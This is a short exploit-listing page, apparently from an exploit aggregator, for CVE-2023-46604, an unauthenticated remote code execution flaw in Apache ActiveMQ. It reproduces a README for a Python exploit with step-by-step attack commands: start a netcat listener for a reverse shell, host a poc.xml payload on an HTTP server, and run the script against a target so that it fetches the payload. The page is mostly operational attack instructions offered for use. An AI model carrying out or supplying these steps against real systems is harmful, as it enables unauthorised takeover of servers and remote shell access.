Exploit for Deserialization of Untrusted Data in Apache Activemq CVE-2023-46604

Name: Exploit for Deserialization of Untrusted Data in Apache Activemq CVE-2023-46604
Rating: 5 (9 reviews)

2026-06-06 | CVSS 10.0

## https://sploitus.com/exploit?id=30BB96C4-5A37-55F2-8924-005F6CD066FF
# CVE-2023-46604-RCE
Python implementation of Apache ActiveMQ Unauthenticated Remote Code Execution

# Setup & Exploit
`nc -lvnp 4444` -> Start Listener 
`python3 -m http.server 8080` -> Host `poc.xml` that contain your payload 
`python3 CVE-2023-46604-RCE.py -i  -p  -u http://:8080/poc.xml` -> Start exploit